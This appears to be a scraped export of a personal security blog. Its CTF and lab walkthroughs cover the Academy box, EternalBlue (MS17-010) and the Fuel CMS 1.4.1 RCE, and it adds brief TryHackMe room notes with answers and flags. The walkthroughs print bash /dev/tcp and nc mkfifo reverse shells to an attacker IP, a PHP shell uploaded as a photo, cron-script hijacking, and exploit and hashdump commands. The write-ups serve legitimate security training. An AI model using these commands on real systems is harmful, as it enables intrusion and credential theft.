Objectives # Network service enumeration Hash cracking techniques Web application vulnerability exploitation File upload bypass techniques Linux privilege escalation through cron job manipulation Environment Setup #This box simulates a vulnerable educational institution\u0026rsquo;s network infrastructure, specifically targeting their student registration system. The environment represents a common scenario where seemingly minor misconfigurations can lead to full system compromise.\nAttack Path Overview # Initial enumeration reveals FTP, HTTP, and SSH services Anonymous FTP access provides crucial student registration information Web application discovered with student portal login File upload vulnerability in student profile section Privilege escalation through periodic backup script Attack Path Diagram # Detailed Walkthrough #Initial Enumeration #Starting with a thorough nmap scan to identify open ports and services:\nnmap -p- -A -T4 192.168.17.136 -oN map.txt The scan revealed the following open ports and services:\nFTP (21) - vsftp 3.0.3 HTTP (80) - Apache httpd 2.4.38 (Debian) SSH (22) - OpenSSH 7.9p1 From this, I identified two primary attack vectors to explore: the FTP service running on port 21 and the web server running on port 80.\nFTP Enumeration #I began by connecting to the FTP server on the target machine. To do this, I used the ftp command, followed by the target IP address. I used anonymous login since this option was enabled on the server.\nftp 192.168.17.136 ls Once connected, I listed the contents of the current directory with the ls command. This revealed a file named note.txt in the present directory.\nAt this point, I downloaded the note.txt file to see if it contained any useful information for further exploitation:\nget note.txt The note contained information about a student registration database, but more interestingly, it included a password hash. This hash seemed like it could be the key to accessing additional resources or gaining further control over the system.\ncat note.txt To identify the hash type, I used the hash-identifier tool on Kali Linux, which identified it as an md5 type hash:\nhash-identifier I saved the hash to an acceptable format and used the Hashcat tool to crack it:\ngedit hashes.txt hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt Web Application Discovery #With the information gathered from the FTP service, I turned my attention to the web server running on port 80. I opened the browser and navigated to the target IP address. The Apache default page appeared, indicating that the server was running Apache and no custom web page had been configured yet.\nMoving to directory enumeration:\nI first checked for any information in robots.txt:\nhttp://192.168.17.136/robots.txt I also examined the page source:\nright-click \u0026gt; view page source To continue my investigation, I initially used dirb for directory busting to identify hidden directories or files on the web server. In addition to using dirb, I also employed the ffuf tool to fuzz a parameter on the server:\ndirb http://192.168.17.136 ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.17.136/FUZZ The results revealed 301 redirects for two interesting paths: /phpmyadmin and /academy. These redirects suggested that these directories were actively being used on the server and could lead to further vulnerabilities or misconfigurations. Upon visiting http://192.168.17.136/academy, I found a login form requesting a student registration number and password:\nGaining Initial Access #Using the previously obtained credentials, I successfully log into the academy student portal login page:\nExploiting File Upload #After successfully logging into the target system, I explored the available options within the online course registration page. The \u0026ldquo;My Profile\u0026rdquo; page at http://192.168.17.136/academy/my-profile.php contained a photo upload form:\nTesting confirmed uploads were stored at:\n/academy/studentphoto/flower.jpg I prepared a PHP reverse shell using the Pentest Monkey payload:\nnano reverse-shell.php I updated the IP entry of the payload match the IP address configured to my Kali attack machine, 192.168.17.134 and I left the 1234 as the port for which I configured the same as the listening port on my Kali attack machine:\nBefore uploading, I started a netcat listener on my Kali attack machine:\nnc -nvlp 1234 I then uploaded the PHP reverse shell through the photo upload form:\nThe shell immediately connected back to my Kali machine and I was logged in to the target using the www-data user account, which did not have any elevated privileges:\nPrivilege Escalation #Using LINPEAS for initial enumeration:\nAt this point, I had successfully gained access as the www-data user, but I wasn’t logged in as root. Therefore, the next step was to attempt privilege escalation to gain higher-level access to the system.\nI decided to use LINPEAS, a popular tool designed to hunt for potential privilege escalation opportunities on Linux systems. LINPEAS automates the process of searching for misconfigurations, weaknesses, and other possible vectors that could allow a low-privileged user to escalate to root.\nLINPEAS can be downloaded from its GitHub repository:\nLINPEAS GitHub Repository\nNext, I created a transfer folder on my Kali machine to store the LINPEAS script. I spun up a web server within this directory to serve files that can be downloaded by other machines.\nmkdir transfers cd transfers python3 -m http.server 80 I downloaded LINPEAS into my transfers directory on my Kali machine and then transfered it to the target (via the reverse shell connection) by using a wget command on the target machine (wget http:///linpeas.sh). I then ran LINPEAS there to search for privilege escalation vectors:\nwget http://192.168.17.134/linpeas.sh chmod +x linpeas.sh ./linpeas.sh LINPEAS revealed several interesting findings:\nA backup script in /home/grimmie that was conifgured as a cron job MySQL credentials User \u0026ldquo;grimmie\u0026rdquo; with elevated privileges Using the discovered credentials, I was able to SSH connect to the target using the grimmie user account:\nssh grimmie@192.168.17.136 Investigating user context:\nOnce logged in, I checked for sudo privileges by running the sudo -l command. However, I received an error. I also checked for any leads via the history command.\nSince Grimmie didn’t have access to sudo, I decided to try the history command to see if there were any previously executed commands that might provide additional insights or opportunities for privilege escalation.\nsudo -l history Investigating the backup.sh Script\nThe LINPEAS output had already pointed out the backup.sh script, so I decided to investigate it further. I navigated to the /home/grimmie directory. In this directory, I found the backup.sh script and examined its contents:\ncd /home/grimmie ls cat backup.sh The backup.sh script does the following as a scheduled task:\nRemoves an existing backup.zip file in the /tmp directory. Creates a backup.zip file containing the /var/www/html/academy/includes directory. Changes the permissions of the backup.zip file to 700, making it accessible only to the file’s owner. Since this script backs up files from the /var/www/html/academy/includes directory, it could provide valuable information or access if these files contain sensitive data.\nInvestigating Cron Jobs for Backup Script\nIt’s possible that the backup.sh script is being run periodically through a cron job, which would automate the backup process. To determine if that’s the case, we can check the cron jobs for both the Grimmie user and the root user, as backup.sh is located in /home/grimmie and could be scheduled to run automatically.\nWe can check for cron jobs using the following commands:\ncrontab -l crontab -u root -l crontab -e systemctl list-timers The output here indicates that there are no cron jobs scheduled for grimmie or the root user.\nChecking System Timers Since cron jobs may not have been used, I turned to systemd timers to see if there were any automated tasks running on a timer. To do this, I ran the following command: This gave me information about any timers set to trigger actions periodically.\nI also used the ps command to check for any running processes that could provide further insight into scheduled tasks. This command showed the running processes on the system, which could include scripts or other services.\nUsing pspy to Confirm the Timer To confirm whether the backup.sh script was running on a timer, I decided to use the pspy tool. pspy is useful for detecting processes running on a system without requiring root privileges.\npspy GitHub\nI downloaded pspy to my Kali machine, in the same directory where I had previously hosted the web server. From the reverse shell connection to the target machine, I requested a download of it to the target using the wget command: Using pspy to monitor for script execution:\nwget http://192.168.17.134/pspy64 chmod +x pspy64 ./pspy64 Pspy is pretty neat! It gave me output of all the processes that are running on the machine. Looking at the provided output, I found that the backup.sh script was indeed running. This confirmed that the script was scheduled to execute periodically. We were able to observe how often it was running—every minute.\nAt this point, I realized I could exploit this recurring task for further access.\nRoot Access #Abusing the Periodic Backup Script Since the backup.sh script was running automatically, I decided to modify it to add a reverse shell payload. This way, when the script executed, it would also execute the reverse shell, giving me access to the system.\nAdding Reverse Shell to backup.sh\nI navigated back to the /home/grimmie directory.\nI then added a reverse shell to the backup.sh script. I grabbed a one-line reverse shell from the Pentest Monkey Reverse Shell cheatsheet:\nPentest Monkey\u0026rsquo;s Reverse Shell Cheat Sheet\nHere’s the command I added to the script:\nI substituted 10.0.0.1 with my attacker IP address and added this to the backup.sh script.\nbash -i \u0026gt;\u0026amp; /dev/tcp/192.168.17.134/8080 0\u0026gt;\u0026amp;1 When the backup script executed, it gave me root access:\nSuccess - Root Access Achieved #Finally, I captured the flag from the /root directory:\nwhoami cd /root ls cat flag.txt Conclusion #This walkthrough demonstrated a complete penetration testing workflow, from initial enumeration through privilege escalation to ultimately achieving root access. The Academy box provided excellent practice in:\nService enumeration Password cracking Web application security File upload vulnerabilities Linux privilege escalation techniques (Cron job) Remember that the techniques demonstrated here should only be used in authorized testing environments. Always ensure you have proper permission before attempting any security testing.\nThank you for reading!\nNotesByNisha ","date":"March 19, 2024","permalink":"https://notesbynisha.com/posts/2024-03-19-rooting-the-academy-box-walkthrough/","section":"Writing","summary":"\u003cblockquote\u003e\n\u003c/blockquote\u003e\n","title":"Rooting the Academy Box: A Practical Ethical Hacking Walkthrough"},{"content":"Exploiting EternalBlue (MS17-010): A Walkthrough and Protection Measures #In this article, we will explore one of the most notorious vulnerabilities in recent history: EternalBlue (MS17-010). This exploit allows attackers to execute remote code on Windows systems, particularly those running the SMB protocol. We’ll examine the mechanics of the vulnerability, provide a detailed walkthrough of exploiting a Blue machine running Windows 7 Ultimate, and discuss best practices for mitigating the risks associated with this vulnerability.\nUnderstanding EternalBlue #EternalBlue is an exploit developed by the NSA and leaked by the Shadow Brokers in 2017. It targets a flaw in Microsoft’s implementation of the SMB protocol, specifically versions 1.0, enabling attackers to send specially designed packets to a vulnerable system. This exploit gained notoriety due to its use in the WannaCry ransomware attack, which caused widespread damage across the globe.\nKey Characteristics # Vulnerability ID: MS17-010 CVE Identifiers: CVE-2017-0144: Related to remote code execution through the SMBv1 protocol. CVE-2017-0145: Related vulnerability affecting the SMB protocol. CVE-2017-0146: Another associated vulnerability. Affected Systems: Windows 7, Windows Server 2008, and earlier versions with SMB v1 enabled. Impact: Remote Code Execution, allowing attackers to gain full control of the system. Initial Reconnaissance #To assess the target, I performed a comprehensive nmap scan on all ports:\nsudo nmap -p- 192.168.17.135 -oN nmap.txt Subsequent scans provided detailed service information about open ports, particularly noting the SMB service on the Windows 7 Ultimate OS:\nsudo nmap -p- -A -T4 192.168.17.135 -oN nmap.txt Identifying Exploitation Opportunities #A search for known exploits targeting Windows 7 Ultimate systems yielded useful information for both manual and automated exploitation:\nAutomated Exploit via Metasploit: The Rapid7 site provided an exploit module suitable for our needs, specifically targeting MS17-010.\nMS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption Local Privilege Escalation: Another exploit could be leveraged for privilege escalation once we gain access to the machine.\nMicrosoft Windows 7 Local Privilege Escalation CVE-2019-1132 Manual Exploit: A Python-based exploit also met the criteria for the vulnerability.\nEternalBlue SMB Remote Code Execution CVE-2017-0144 Understanding the Vulnerability #To further comprehend MS17-010, I consulted Microsoft\u0026rsquo;s security bulletin, which outlines the vulnerability\u0026rsquo;s impact and mitigation strategies:\nMicrosoft Security Bulletin MS17-010 - Critical\nAutomated Exploitation with Metasploit #I initiated the exploitation process by launching Metasploit and searching for relevant modules:\nmsfconsole search eternalblue Next, I identified an auxiliary SMB scanner module to verify if the target was vulnerable. I selected option 3 and configured the required settings:\nuse 3 options After running the scan, the results indicated a vulnerability to MS17-010:\nsetg RHOSTS 192.168.17.135 run I then proceeded to find the appropriate exploit module for MS17-010:\nuse 0 Before executing the exploit, I verified that all required options were set, ensuring to specify the LHOST IP address of my attacker machine:\noptions To further confirm the target\u0026rsquo;s vulnerability, I executed:\ncheck I then set the payload for a 64-bit reverse TCP Meterpreter shell:\nset payload windows/x64/meterpreter/reverse_tcp run Upon successful exploitation, I established a Meterpreter session on the target machine:\nPost-Exploitation: Extracting Password Hashes #With the session active, I executed the hashdump command to retrieve password hashes from the system:\nhashdump This command provided the administrator account\u0026rsquo;s password hash, enabling further actions using tools like Hashcat or John the Ripper to crack the password and gain elevated access. Manual Exploitation #An additional Google search for EternalBlue exploits lead to the disocvery of this particular exploit that seems easier to achieve our goal:\nAutoBlue-MS17-010 hosted by 3ndG4me I cloned this repo to the /opt directory on my Kali machine:\nsudo git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git cd AutoBlue-MS17-010 Next, I implemented the requirements per the directions listed on the repo to meet the Python 3 requirement:\npip install -r requirements.txt Running the checker, we see that the target is not patched and, therefore, vulnerable, to this exploit.\npython eternal_checker.py 192.168.17.135 Next, I navigated to the shellcode directory to execute the shell prep script and provided the following inputs for the Eternal Blue Windows Shellcode Compiler:\ncd shellcode sudo ./shell_prep.sh 192.168.17.134 # LHOST for reverse connection 9999 # LPORT for x64 2222 # LPORT for x86 1 # Type 1 for a regular staged cmd shell 0 # Type 0 for a Meterpreter shell Listener Prep #Next, I executed the listener prep script to provide the configuration settings needed to establish a listener in Metasploit that would accept incoming connections from the target machine once the exploit is executed.\ncd .. sudo ./listener_prep.sh Time to run the exploit: #python eternalblue_exploit7.py 192.168.17.135 shellcode/sc_all.bin In this case, the exploit crashed the target machine, resulting in the Blue screen: Mitigation Strategies #To protect against the exploitation of EternalBlue, organizations and individuals should implement the following strategies:\nPatch Systems: Regularly apply security updates and patches provided by Microsoft. The patch for MS17-010 was released in March 2017; ensure it is installed on all systems. Disable SMBv1: As SMBv1 is outdated and insecure, disable it on all systems unless absolutely necessary. Network Segmentation: Isolate critical systems from general access. Implement strict firewall rules to limit SMB traffic. Intrusion Detection Systems (IDS): Utilize IDS to monitor for suspicious traffic patterns indicative of an EternalBlue exploit attempt. Regular Backups: Maintain regular backups of critical data to mitigate the impact of ransomware attacks. The Eternal Blue vulnerability continues to pose significant risks to unpatched systems. Through a combination of effective reconnaissance and exploitation techniques, this walkthrough demonstrates the process of compromising a vulnerable Windows 7 machine. To protect against such vulnerabilities, regular patching, proper configuration, and monitoring are essential.\n","date":"March 18, 2024","permalink":"https://notesbynisha.com/posts/2024-03-18-exploiting-eternal-blue-walkthrough-protection/","section":"Writing","summary":"A detailed walkthrough of how to exploit the Eternal Blue vulnerability on a Windows 7 Ultimate machine, covering both manual and automated methods.","title":"Exploiting EternalBlue (MS17-010): A Walkthrough and Protection Measures"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/vulnerability-exploitation/","section":"Tags","summary":"","title":"Vulnerability Exploitation"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/remote-code-execution-rce/","section":"Tags","summary":"","title":"Remote Code Execution (RCE)"},{"content":"Table of Contents # Enumeration Vulnerability Discovery Understanding the Exploit Exploit Execution Post Exploitation Privilege Escalation Mitigation and Defense In this TryHackMe Ignite room walkthrough, I exploit a Remote Code Execution (RCE) vulnerability in Fuel CMS version 1.4.1 (CVE-2018-16763). The objective was to gain command execution on the target, understand how the exploit works, and identify ways to defend against such vulnerabilities. This walkthrough covers not only how to gain remote command execution but also how to escalate privileges using credential reuse via misconfigured application credentials to achieve root access.\n👉 TryHackMe Ignite Room\nEnumeration #The first step was to identify open ports and services running on the target machine.\nnmap -p- -T4 -vv 10.10.95.244 The scan revealed that port 80 was open and running Apache httpd 2.4.18.\nAfter discovering that port 80 was open, I entered the target\u0026rsquo;s IP address in the browser. This revealed the Fuel CMS Getting Started page, which disclosed:\nThe CMS version (1.4.1) Details about installation and configuration directories I performed a service enumeration scan to gather more information.\nnmap -sC -sV -p80 10.10.95.244 Findings: # The web service was hosting FUEL CMS robots.txt contained one disallowed entry: /fuel (the CMS login page) Navigating to /fuel presented the login portal.\nThe Getting Started page revealed default credentials:\nI logged in successfully and gained access to the Fuel CMS admin dashboard. After browsing through Pages, Blocks, Assets, Users, and Settings, there were no immediate points for further exploitation.\nVulnerability Discovery #The target was running Fuel CMS 1.4.1, which is known to have a Remote Code Execution (RCE) vulnerability.\nA Google search quickly led me to Exploit-DB:\n👉Exploit-DB CVE-2018-16763\nI also found the same exploit using searchsploit:\nsearchsploit fuel cms searchsploit -m php/webapps/50477.py Understanding the Exploit #This vulnerability lies in improper input validation on the filter parameter in the /fuel/pages/select/ endpoint. It allows arbitrary PHP code injection, resulting in Remote Code Execution (RCE).\nRoot Cause: Lack of input validation in the filter parameter Security Impact: Execution of arbitrary system commands by an unauthenticated attacker Exploit Execution #After importing the exploit code locally, I executed it against the target.\npython3 50477.py -u http://10.10.95.244 The exploit provided an interactive shell-like interface. I ran the following commands to confirm remote code execution:\nls sudo -l whoami id During this phase, I observed some unusual behavior. Running sudo -l returned the word system instead of the expected output. This was likely due to the exploit leveraging the PHP system() function.\nDespite this, I confirmed command execution as the www-data user.\nPost Exploitation #Once confirmed as the www-data user, I enumerated the environment.\nI recalled the CMS homepage mentioned that database credentials were located in: fuel/application/config/database.php\nI accessed the file and retrieved the credentials.\ncat fuel/application/config/database.php With these credentials, an attacker could:\nAccess the backend database Dump sensitive data Attempt credential reuse for privilege escalation Further enumeration revealed a flag in /home/www-data/:\nls /home/www-data cat /home/www-data/flag.txt Contents of flag.txt:\n6470e394cbf6dab6a91682cc8585059b\nFor stability, I spawned a reverse shell using nc:\nrm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2\u0026gt;\u0026amp;1 | nc 10.2.119.123 1234 \u0026gt; /tmp/f Privilege Escalation #I attempted to escalate privileges to the root user.\nRunning su root gave me the error:\n\u0026ldquo;must be run from a terminal\u0026rdquo;\nI fixed this by spawning a pseudo-terminal:\npython -c \u0026#39;import pty; pty.spawn(\u0026#34;/bin/sh\u0026#34;)\u0026#39; I then retried su root using the database credentials:\nSuccessful! I was now root.\nid cat /root/root.txt I retrieved the root flag from /root/root.txt:\nRoot flag: #b9bbcb33e11b80be759c4e844862482d\nMitigation and Defense #To prevent similar attacks:\nPatch Management # Regularly update to the latest version of Fuel CMS. This vulnerability is fixed in versions above 1.4.1. Input Validation # Sanitize and validate all user inputs, especially in query parameters. Disable Dangerous PHP Functions # In your php.ini, disable functions such as eval(), system(), and exec() unless absolutely necessary. Test thoroughly to ensure application functionality. Least Privilege Principle # Run services with the least privileges necessary. Limit access to sensitive directories and files. Web Application Firewall (WAF) #Use WAFs to detect and block malicious payloads before they reach the application.\nThis Ignite room was a solid reminder that poor coding practices and outdated software expose serious vulnerabilities. Simple input validation failures can lead to complete system compromise.\n➡️ Stay patched. Stay vigilant.\n🙌 Thanks for reading! Follow me for more hands-on cybersecurity content, CTF write-ups, and practical tutorials.\n🔗 TryHackMe Ignite Room 🛡️ #NotesByNisha | #TryHackMe | #CTF | #PenetrationTesting | #RedTeam | #CyberSecurity\n","date":"March 17, 2024","permalink":"https://notesbynisha.com/posts/2024-07-02-ignite-tryhackme-walkthrough/","section":"Writing","summary":"Walkthrough of TryHackMe\u0026rsquo;s Ignite room where we exploit a Remote Code Execution vulnerability in Fuel CMS 1.4.1 (CVE-2018-16763). Learn the steps of enumeration, exploitation, privilege escalation, and defense strategies.","title":"TryHackMe Ignite Room Walkthrough: Exploiting Fuel CMS 1.4.1 RCE"},{"content":" Room Link: Task 2 Enumeration w/ Powerview\n","date":"February 15, 2024","permalink":"https://notesbynisha.com/posts/2024-02-15-post-exploitation-basics-thm-walkthrough/","section":"Writing","summary":"\u003cp\u003e\u003cstrong\u003e Room Link: \u003c/strong\u003e\nTask 2  Enumeration w/ Powerview\u003c/p\u003e","title":"TryHackMe Walkthough - Post-Exploitation Basics"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/endpoint-security/","section":"Tags","summary":"","title":"Endpoint Security"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/logging/","section":"Tags","summary":"","title":"Logging"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/monitoring/","section":"Tags","summary":"","title":"Monitoring"},{"content":"Introduction to Windows Event Logs and the tools to query them. # Room Link: https://tryhackme.com/r/room/windowseventlogs\n","date":"December 24, 2023","permalink":"https://notesbynisha.com/posts/2023-12-24-windows-event-logs-thm/","section":"Writing","summary":"\u003ch3 id=\"introduction-to-windows-event-logs-and-the-tools-to-query-them\" class=\"relative group\"\u003eIntroduction to Windows Event Logs and the tools to query them. \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#introduction-to-windows-event-logs-and-the-tools-to-query-them\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h3\u003e\u003cp\u003e\u003cstrong\u003e Room Link: \u003c/strong\u003e   \u003ca href=\"https://tryhackme.com/r/room/windowseventlogs\" target=\"_blank\" rel=\"noopener noreferrer\"\u003e \u003ca href=\"https://tryhackme.com/r/room/windowseventlogs\" target=\"_blank\" rel=\"noreferrer\"\u003ehttps://tryhackme.com/r/room/windowseventlogs\u003c/a\u003e\u003c/a\u003e\u003c/p\u003e","title":"Windows Event Logs (TryHackMe Walkthrough)"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/defensive/","section":"Tags","summary":"","title":"Defensive"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/network/","section":"Tags","summary":"","title":"Network"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/traffic-analysis/","section":"Tags","summary":"","title":"Traffic Analysis"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/wireshark/","section":"Tags","summary":"","title":"Wireshark"},{"content":" Room Link: https://tryhackme.com/r/room/wiresharkthebasics\nLearning Objectives\nTask 1 - Introduction # Question: Which file is used to simulate the screenshots? Answer: http1.pcapng \u0026lt;strong\u0026gt;Question: Which file is used to answer the questions? \u0026lt;/strong\u0026gt; \u0026lt;em\u0026gt; Answer: Exercise.pcapng \u0026lt;/em\u0026gt;\u0026lt;/br\u0026gt; Task 2 - Tool Overview # Use the \u0026ldquo;Exercise.pcapng\u0026rdquo; file to answer the questions.\nRead the \u0026ldquo;capture file comments\u0026rdquo;. What is the flag? TryHackMe_Wireshark_Demo Correct Answer What is the total number of packets?\n58620 Correct Answer What is the SHA256 hash value of the capture file?\nf446de335565fb0b0ee5e5a3266703c778b2f3dfad7efeaeccb2da5641a6d6eb\nTask 3 - Packet Dissection #Task 4 - Packet Navigation #Task 5 - Packet Filtering #Task 6 - Conclusion #","date":"December 5, 2023","permalink":"https://notesbynisha.com/posts/2023-12-05-wireshark-basics/","section":"Writing","summary":"\u003cp\u003e\u003cstrong\u003e Room Link: \u003c/strong\u003e  \u003ca href=\"https://tryhackme.com/r/room/wiresharkthebasics\" target=\"_blank\"\u003e\u003ca href=\"https://tryhackme.com/r/room/wiresharkthebasics\" target=\"_blank\" rel=\"noreferrer\"\u003ehttps://tryhackme.com/r/room/wiresharkthebasics\u003c/a\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eLearning Objectives\u003c/strong\u003e\u003c/p\u003e\n\u003ch2 id=\"task-1---introduction\" class=\"relative group\"\u003eTask 1 - Introduction \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#task-1---introduction\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003cp\u003e\n    \u003cstrong\u003eQuestion: Which file is used to simulate the screenshots?\u003c/strong\u003e\n    \u003cem\u003e Answer: http1.pcapng \u003c/em\u003e\u003c/br\u003e\n\u003cpre\u003e\u003ccode\u003e\u0026lt;strong\u0026gt;Question: Which file is used to answer the questions?   \u0026lt;/strong\u0026gt;\n\u0026lt;em\u0026gt; Answer: Exercise.pcapng \u0026lt;/em\u0026gt;\u0026lt;/br\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/p\u003e","title":"Wireshark: The Basics - THM Walkthrough by Nisha"},{"content":"Linux Fundamentals I - TryHackMe Walkthrough By Nisha #","date":"November 19, 2023","permalink":"https://notesbynisha.com/posts/2023-11-19-linux-fundamentals-1-thm/","section":"Writing","summary":"Embark on the journey of learning the fundamentals of Linux. Learn to run some of the first essential commands on an interactive terminal..","title":"Linux Fundamentals I - TryHackMe Walkthrough By Nisha"},{"content":" Room Link: https://tryhackme.com/r/room/contentdiscovery\nIn cybersecurity, discovering hidden or non-obvious content on web servers is critical for any aspiring ethical hacker. The \u0026ldquo;Content Discovery\u0026rdquo; room on TryHackMe offers a detailed, hands-on approach to mastering techniques for uncovering various types of web content that can reveal vulnerabilities or sensitive data. Ideal for learners looking to deepen their web penetration testing skills, this room enhances the ability to pinpoint potential entry points on a target website.\nLearning Objectives Understanding the Basics of Content Discovery: Learn the fundamental concepts behind discovering hidden files and directories on a web server using manual methods. Employing OSINT Techniques: Utilize Open Source Intelligence (OSINT) methods to gather publicly available information that can guide and enhance your content discovery efforts. Using Tools for Automated Content Discovery: Gain practical experience with popular automated tools like Dirb, Dirbuster, and Gobuster. These tools automate the search for hidden content, increasing efficiency and thoroughness. Analyzing Web Server Responses: Develop the ability to analyze HTTP responses to identify useful information that could lead to further exploitation opportunities. Advanced Techniques and Methodologies: Explore advanced content discovery techniques, including the use of wordlists, recursive searches, and the handling of different response codes, integrating both manual and automated methods. Real-World Application and Scenarios: Apply your skills in realistic scenarios provided by TryHackMe to simulate the process of conducting content discovery during a penetration test using a blend of manual, OSINT, and automated methods. Task 1 - What Is Content Discovery? # Certainly! Here\u0026rsquo;s the revised text without using the word \u0026ldquo;realm\u0026rdquo;:\nFirst, let's clarify what we mean by \"content\" in web application security. Content can include various elements like files, videos, images, backups, and specific website features. Content discovery focuses on identifying not just the visible elements of a website but also those that are hidden or not meant for public access.\nThis hidden content might include pages or portals meant for staff use, older website versions, backup files, configuration files, and administrative panels. We will examine three primary methods for discovering content on a website: Manual discovery, Automated tools, and OSINT (Open-Source Intelligence). To get started, launch the AttackBox by clicking the blue \"Start AttackBox\" button, and also initiate the machine associated with this task. Question: What is the Content Discovery method that begins with M? Answer: Manually Question:What is the Content Discovery method that begins with A?\nAnswer: Automated\nQuestion:What is the Content Discovery method that begins with O?\nAnswer: OSINT Task 2 - Manual Discovery - Robots.txt #There are various areas on a website that we can manually inspect to begin uncovering additional content.\nRobots.txt\nThe robots.txt file is a guide for search engines, specifying which pages should or should not be indexed in their search results or even prohibiting certain search engines from scanning the site. Often, this file is used to hide specific parts of the site, like administrative portals or customer-only files, from appearing in search results. For penetration testers, this file can be an invaluable source, revealing the very areas of the website that the owners prefer to keep hidden.\nTake a look at the robots.txt file on the Acme IT Support website to see if they have anything they don\u0026rsquo;t want to list Question:What is the directory in the robots.txt that isn't allowed to be viewed by web crawlers?\nAnswer: /staff-portal Task 3 - Manual Discovery - Favicon #There are various areas on a website that we can manually inspect to begin uncovering additional content. One such area is the favicon.\nFavicon The favicon is a small icon that appears in the browser's address bar or tab, primarily used for branding purposes. Sometimes, when developers use specific frameworks to build a website, they may leave the default favicon provided by the framework. If this default is not replaced with a custom one, it can indicate which framework was used to construct the site. The OWASP organization maintains a database of common framework icons, which can be accessed at OWASP Favicon Database. Identifying the framework helps us to leverage external resources for deeper insights into the website’s structure.\nPractical Exercise Launch Firefox in the AttackBox and navigate to this site. You will see a page indicating \"Website coming soon...\" and, upon checking the tabs, you'll notice the favicon that hints at the underlying framework. Viewing the page source reveals a link to the favicon at images/favicon.ico.\nTo determine the framework via the favicon, download the icon and compute its MD5 hash using the following commands:\ncurl https://static-labs.tryhackme.cloud/sites/favicon/images/favicon.ico | md5sum Note: If using the free version of AttackBox, this command may fail. Alternatively, use a VM, or on Windows, run the following PowerShell commands:\nPS C:\\\u0026gt; curl https://static-labs.tryhackme.cloud/sites/favicon/images/favicon.ico -UseBasicParsing -o favicon.ico PS C:\\\u0026gt; Get-FileHash .\\favicon.ico -Algorithm MD5 Q: What framework did the favicon belong to? Answer: cgiirc Task 4 - Manual Discovery - Sitemap.xml #Sitemap.xml Contrary to the robots.txt file, which limits what search engine crawlers can access, the sitemap.xml file provides a comprehensive list of all files that the website owner wants to be indexed by search engines. This list may include harder-to-navigate sections of the website or even reveal older webpages that are no longer visible on the current site but are still accessible.\nExamine the sitemap.xml file on the Acme IT Support website to uncover any content that might not have been discovered yet. Access it by opening the following URL in the FireFox browser on the AttackBox: http://10.10.185.115/sitemap.xml.\nTask 5 - Manual Discovery - HTTP Headers #Task 6 - Manual Discovery - Framework Stack #Task 7 - OSINT - Google Hacking / Dorking #Task 8 - OSINT - Wappalyzer #Task 9 - OSINT - Wayback Machine #Task 10 - OSINT - GitHub #Task 11 - OSINT - S3 Buckets #Task 12 - Automated Discovery #","date":"October 13, 2023","permalink":"https://notesbynisha.com/posts/2023-10-13-content-discovery-thm-walkthough/","section":"Writing","summary":"\u003cp\u003e\u003cstrong\u003e Room Link: \u003c/strong\u003e  \u003ca href=\"https://tryhackme.com/r/room/contentdiscovery\" target=\"_blank\"\u003e\u003ca href=\"https://tryhackme.com/r/room/contentdiscovery\" target=\"_blank\" rel=\"noreferrer\"\u003ehttps://tryhackme.com/r/room/contentdiscovery\u003c/a\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\n\u003cp\u003eIn cybersecurity, discovering hidden or non-obvious content on web servers is critical for any aspiring ethical hacker. The \u0026ldquo;Content Discovery\u0026rdquo; room on TryHackMe offers a detailed, hands-on approach to mastering techniques for uncovering various types of web content that can reveal vulnerabilities or sensitive data. Ideal for learners looking to deepen their web penetration testing skills, this room enhances the ability to pinpoint potential entry points on a target website.\u003c/p\u003e","title":"Content Discovery - THM Walkthrough by Nisha"},{"content":" Room Link: https://app.hackthebox.com/starting-point?tier=0\nTask 1 - #Task 2 - #Task 3 - # ","date":"September 28, 2023","permalink":"https://notesbynisha.com/posts/2023-09-28-meow-htb-walkthrough/","section":"Writing","summary":"\u003cp\u003e\u003cstrong\u003e Room Link: \u003c/strong\u003e  \u003ca href=\"https://app.hackthebox.com/starting-point?tier=0\" target=\"_blank\"\u003e\u003ca href=\"https://app.hackthebox.com/starting-point?tier=0\" target=\"_blank\" rel=\"noreferrer\"\u003ehttps://app.hackthebox.com/starting-point?tier=0\u003c/a\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2 id=\"task-1--\" class=\"relative group\"\u003eTask 1 - \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#task-1--\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003ch2 id=\"task-2--\" class=\"relative group\"\u003eTask 2 - \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#task-2--\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003ch2 